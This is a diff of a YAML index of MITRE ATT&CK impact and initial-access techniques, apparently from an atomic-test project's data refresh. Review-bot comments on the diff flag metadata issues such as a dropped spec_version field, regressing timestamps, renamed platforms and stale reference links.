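Review bot: the new `T1496.001` (Compute Hijacking) entry lands with `x_mitre_detection: ''` and `atomic_tests: []`, so the index gains a sub-technique that carries neither detection guidance nor a test mapping, and its description is the same cryptomining text this patch strips out of the parent `T1496` description further down. That matches an upstream split rather than a loss of content, but it is worth one sentence in the PR description saying the ATT&CK data bump moves that text into the sub-technique, and any Resource Hijacking tests currently tagged `T1496` should be checked for whether they now belong under `T1496.001`.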
@@ -57903,11 +58882,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1531:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:35:13.577Z'
name: Account Access Removal
description: "Adversaries may interrupt availability of system and network resources
by inhibiting access to accounts utilized by legitimate users. Accounts may
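Review bot: `spec_version: '2.1'` is dropped from the `T1565` object here (and from every other technique object touched by this patch) while `x_mitre_attack_spec_version: 3.2.0` is kept. If anything downstream loads these `technique:` blocks as STIX objects, `spec_version` is the field it keys on, so confirm the generator omits it deliberately and that the source bundle no longer carries it, or restore it in the index builder rather than letting the field disappear silently in a data refresh.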
@@ -57930,6 +58908,7 @@ impact:
phase_name: impact
x_mitre_contributors:
- Hubert Mank
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -57947,9 +58926,10 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- x_mitre_version: '1.2'
+ - IaaS
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'User Account: User Account Modification'
@@ -57975,9 +58955,8 @@ impact:
url: https://unit42.paloaltonetworks.com/born-this-way-origins-of-lockergoga/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1531
atomic_tests: []
T1486:
@@ -58064,7 +59043,7 @@ impact:
NHS Digital Egregor Nov 2020)\n\nIn cloud environments, storage objects within
compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware
Part 1)"
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T13:07:10.318Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Data Encrypted for Impact
x_mitre_detection: |-
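Review bot: `modified` for `T1486` moves backwards here, from `2022-11-08T14:00:00.188Z` to `2022-06-16T13:07:10.318Z`, and the same happens later in this patch for `T1529` (`2023-05-09` to `2023-03-22`) and `T1133` (`2023-05-09` to `2023-03-30`). The old values all share the `T14:00:00.188Z` suffix, which looks like a bulk re-stamp, so the new per-object timestamps are probably the more faithful ones, but a regressing `modified` will confuse any consumer that uses it to decide whether an object changed; a line in the PR description naming the source bundle and confirming this is expected would settle it.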
@@ -58088,12 +59067,11 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1486
atomic_tests: []
T1499:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:56:47.424Z'
name: Endpoint Denial of Service
description: |
Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58112,7 +59090,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Alfredo Oliveira, Trend Micro
- David Fiser, @anu4is, Trend Micro
@@ -58129,18 +59106,13 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- x_mitre_version: '1.1'
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
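Review bot: the platform list for `T1499` loses `Azure AD`, `Office 365`, `SaaS`, `IaaS` and `Google Workspace` and only gets `IaaS` back, so Endpoint DoS is no longer tagged for any SaaS or identity platform; the same rename pattern (`Office 365` to `Office Suite`, `Azure AD` and `Google Workspace` removed, `Identity Provider` added) appears for `T1531`, `T1498` and `T1566.002` elsewhere in this patch. Any per-platform index, filter or test tag that still keys on the old platform names will match nothing once this lands, so those artifacts need regenerating or retiring in the same change rather than being left to go stale.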
@@ -58164,8 +59136,8 @@ impact:
- source_name: FSISAC FraudNetDoS September 2012
description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- source_name: ArsTechnica Great Firewall of China
description: Goodin, D.. (2015, March 31). Massive denial-of-service attack
on GitHub tied to Chinese government. Retrieved April 19, 2019.
@@ -58185,33 +59157,22 @@ impact:
url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1496:
technique:
- modified: '2024-02-14T21:00:00.467Z'
+ modified: '2024-10-13T17:00:09.759Z'
name: Resource Hijacking
description: "Adversaries may leverage the resources of co-opted systems to
complete resource-intensive tasks, which may impact system and/or hosted service
- availability. \n\nOne common purpose for Resource Hijacking is to validate
- transactions of cryptocurrency networks and earn virtual currency. Adversaries
- may consume enough system resources to negatively impact and/or cause affected
- machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood
- Blog 2017) Servers and cloud-based systems are common targets because of the
- high potential for available resources, but user endpoint systems may also
- be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation:
- CloudSploit - Unused AWS Regions) Containerized environments may also be targeted
- due to the ease of deployment via exposed APIs and the potential for scaling
- mining activities by deploying or compromising multiple containers within
- an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation:
- Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining
- malware identify then kill off processes for competing malware to ensure it’s
- not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries
- may also use malware that leverages a system's network bandwidth as part of
- a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498)
- campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively,
- they may engage in proxyjacking by selling use of the victims' network bandwidth
- and IP address to proxyware services.(Citation: Sysdig Proxyjacking)"
+ availability. \n\nResource hijacking may take a number of different forms.
+ For example, adversaries may:\n\n* Leverage compute resources in order to
+ mine cryptocurrency\n* Sell network bandwidth to proxy networks\n* Generate
+ SMS traffic for profit\n* Abuse cloud-based messaging services to send large
+ quantities of spam messages\n\nIn some cases, adversaries may leverage multiple
+ types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking
+ 2023)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -58222,7 +59183,7 @@ impact:
- Magno Logan, @magnologan, Trend Micro
- Vishwas Manral, McAfee
- Yossi Weizman, Azure Defender Research Team
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: Consider monitoring process resource usage to determine anomalous
activity associated with malicious hijacking of computer resources such as
@@ -58239,8 +59200,11 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.5'
+ - SaaS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- 'File: File Creation'
@@ -58259,99 +59223,73 @@ impact:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1496
external_id: T1496
- - source_name: Unit 42 Hildegard Malware
- description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking
- Malware Targeting Kubernetes. Retrieved April 5, 2021.'
- url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/
- - source_name: CloudSploit - Unused AWS Regions
- description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions.
- Retrieved October 8, 2019.
- url: https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc
- - source_name: Sysdig Proxyjacking
- description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
- Chat. Retrieved July 6, 2023.
- url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
- - source_name: Kaspersky Lazarus Under The Hood Blog 2017
- description: GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April
- 17, 2019.
- url: https://securelist.com/lazarus-under-the-hood/77908/
- - source_name: Trend Micro Exposed Docker APIs
- description: Oliveira, A. (2019, May 30). Infected Containers Target Docker
- via Exposed APIs. Retrieved April 6, 2021.
- url: https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html
- - source_name: Trend Micro War of Crypto Miners
- description: 'Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency
- Miners: A Battle for Resources. Retrieved April 6, 2021.'
- url: https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html
- - source_name: GoBotKR
- description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
- Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
- url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ - source_name: Sysdig Cryptojacking Proxyjacking 2023
+ description: 'Miguel Hernandez. (2023, August 17). LABRAT: Stealthy Cryptojacking
+ and Proxyjacking Campaign Targeting GitLab . Retrieved September 25, 2024.'
+ url: https://sysdig.com/blog/labrat-cryptojacking-proxyjacking-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1496
atomic_tests: []
T1565.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
- created: '2020-03-02T14:27:00.693Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1565.002
- url: https://attack.mitre.org/techniques/T1565/002
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- - source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
- description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-08-26T16:33:33.983Z'
+ name: Transmitted Data Manipulation
description: |-
Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
Manipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Transmitted Data Manipulation
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
can be difficult without the appropriate tools. In some cases integrity verification
checks, such as file hashing, may be used on critical files as they transit
a network. With some critical processes involving transmission of data, manual
or out-of-band integrity checking may be useful for identifying manipulated
data. '
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Integrity
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6
+ created: '2020-03-02T14:27:00.693Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/002
+ external_id: T1565.002
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1485:
technique:
- modified: '2023-10-03T17:30:32.192Z'
+ modified: '2024-09-25T20:46:14.641Z'
name: Data Destruction
description: |-
Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del
and rm
often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.
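Review bot: stray space before the full stop in the new `Sysdig Cryptojacking Proxyjacking 2023` reference description, `Targeting GitLab . Retrieved September 25, 2024.`; this text is copied from the upstream ATT&CK STIX object, so the fix belongs upstream or in the generator's reference cleanup, not in a hand edit of the index. In the same hunk the `FireEye APT38 Oct 2018` URL moves from `content.fireeye.com/apt/rpt-apt38` to a `mandiant.com` PDF while the retrieved date stays `November 6, 2018`; the date no longer describes the URL, which is the kind of drift the `web.archive.org` snapshot used for the ACSC reference later in this patch avoids.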
@@ -58360,7 +59298,7 @@ impact:
To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).
- In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
+ In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -58386,9 +59324,10 @@ impact:
- Linux
- macOS
- Containers
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Snapshot: Snapshot Deletion'
+ - 'Cloud Storage: Cloud Storage Modification'
- 'Process: Process Creation'
- 'File: File Deletion'
- 'Image: Image Deletion'
@@ -58444,55 +59383,11 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1485
atomic_tests: []
T1498:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- - Containers
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Yossi Weizman, Azure Defender Research Team
- - Vishwas Manral, McAfee
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
- type: attack-pattern
- created: '2019-04-17T20:23:15.105Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1498
- url: https://attack.mitre.org/techniques/T1498
- - source_name: FireEye OpPoisonedHandover February 2016
- url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
- description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
- 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
- Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
- - source_name: FSISAC FraudNetDoS September 2012
- url: https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
- description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
- Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
- Fraud. Retrieved April 18, 2019.
- - source_name: Symantec DDoS October 2014
- url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
- description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
- Retrieved April 24, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T16:01:00.510Z'
name: Network Denial of Service
description: |-
Adversaries may perform Network Denial of Service (DoS) attacks to degrade or block the availability of targeted resources to users. Network DoS can be performed by exhausting the network bandwidth services rely on. Example resources include specific websites, email services, DNS, and web-based applications. Adversaries have been observed conducting network DoS attacks for political purposes(Citation: FireEye OpPoisonedHandover February 2016) and to support other malicious activities, including distraction(Citation: FSISAC FraudNetDoS September 2012), hacktivism, and extortion.(Citation: Symantec DDoS October 2014)
@@ -58507,6 +59402,10 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_contributors:
+ - Yossi Weizman, Azure Defender Research Team
+ - Vishwas Manral, McAfee
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
service, but such response time typically requires very aggressive monitoring
@@ -58519,16 +59418,52 @@ impact:
may be small and the indicator of an event availability of the network or
service drops. The analysis tools mentioned can then be used to determine
the type of DoS causing the outage and help with remediation.'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ - Containers
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
x_mitre_impact_type:
- Availability
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+ created: '2019-04-17T20:23:15.105Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1498
+ external_id: T1498
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: FSISAC FraudNetDoS September 2012
+ description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+ Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+ Fraud. Retrieved September 23, 2024.
+ url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+ - source_name: FireEye OpPoisonedHandover February 2016
+ description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+ 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+ Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+ url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+ - source_name: Symantec DDoS October 2014
+ description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+ Retrieved April 24, 2019.
+ url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1495:
technique:
@@ -58596,11 +59531,10 @@ impact:
- Availability
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1490:
technique:
- modified: '2024-04-12T02:30:08.379Z'
+ modified: '2024-09-24T13:27:31.881Z'
name: Inhibit System Recovery
description: |-
Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -58618,7 +59552,7 @@ impact:
On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
- Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+ Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
@@ -58645,7 +59579,7 @@ impact:
- Network
- IaaS
- Containers
- x_mitre_version: '1.4'
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Modification'
@@ -58695,13 +59629,12 @@ impact:
url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
- source_name: disable_notif_synology_ransom
description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
- servers before ransom. Retrieved October 19, 2022.
- url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+ servers before ransom. Retrieved September 12, 2024.
+ url: https://x.com/TheDFIRReport/status/1498657590259109894
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1490
atomic_tests: []
T1561.001:
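Review bot: the `disable_notif_synology_ransom` reference is re-pointed from `twitter.com` to `x.com` with a new retrieved date, but a social-media post is the reference most likely to disappear again, and elsewhere in this patch the ACSC PDF was switched to a `web.archive.org` snapshot, presumably for durability. Suggest the same treatment here if the generator allows overriding the upstream URL, otherwise raise it upstream so the next data refresh does not reintroduce a live-only link.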
@@ -58769,11 +59702,10 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1529:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T20:45:22.531Z'
name: System Shutdown/Reboot
description: |-
Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload
).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
@@ -58838,13 +59770,12 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1529
atomic_tests: []
initial-access:
T1133:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:36.318Z'
name: External Remote Services
description: |-
Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -58922,7 +59853,6 @@ initial-access:
url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1133
atomic_tests: []
T1195.001:
@@ -58972,11 +59902,10 @@ initial-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1566.002:
technique:
- modified: '2024-04-15T23:51:25.037Z'
+ modified: '2024-10-15T16:06:32.591Z'
name: 'Phishing: Spearphishing Link'
description: |-
Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -59015,10 +59944,10 @@ initial-access:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '2.6'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
@@ -59035,7 +59964,7 @@ initial-access:
- source_name: ACSC Email Spoofing
